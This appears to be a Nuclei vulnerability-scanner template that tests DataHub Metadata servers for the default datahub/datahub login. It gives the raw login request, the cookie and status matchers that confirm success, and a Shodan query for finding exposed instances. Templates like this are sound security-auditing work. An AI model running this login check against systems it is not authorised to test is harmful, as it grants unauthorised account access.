id: datahub-metadata-default-login

info:
  name: DataHub Metadata - Default Login
  author: queencitycyber
  severity: high
  description: DataHub Metadata contains a default login vulnerability.  An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/datahub-project/datahub/blob/master/docs/rfc/active/access-control/access-control.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"DataHub"
  tags: datahub,default-login

http:
  - raw:
      - |
        POST /logIn HTTP/2
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - datahub
      password:
        - datahub

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: actor=urn:li:corpuser:datahub;'

      - type: status
        status:
          - 200

# digest: 490a004630440220450c9c01ce42077bae8a4ceebefecdaddf84e7b94c61a2aa37cb4bc067c507f10220283236919bce5a0113436f623dae443952461db3aef86abd9e3a6ec4fc9eecd3:922c64590222798bb761d5b6d8e72950